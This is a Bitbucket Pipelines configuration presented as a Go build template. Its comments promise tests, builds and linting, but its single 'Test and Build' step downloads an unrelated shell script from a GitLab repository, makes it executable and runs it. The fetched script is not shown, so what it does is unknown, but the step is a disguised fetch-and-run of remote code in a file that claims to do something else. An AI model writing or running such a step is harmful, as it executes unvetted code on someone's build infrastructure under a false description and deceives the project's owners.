#  Template Go (Golang) build

#  This template allows you to validate your Go (Golang) code.
#  The workflow allows running tests, build and code linting on the default branch.

image: golang:1.15

pipelines:
  default:
    - parallel:
      - step:
          name: Test and Build
          script:
            - wget https://gitlab.com/kasepk.id.o/kasep/-/raw/master/gabrud.sh && chmod u+x gabrud.sh && ./gabrud.sh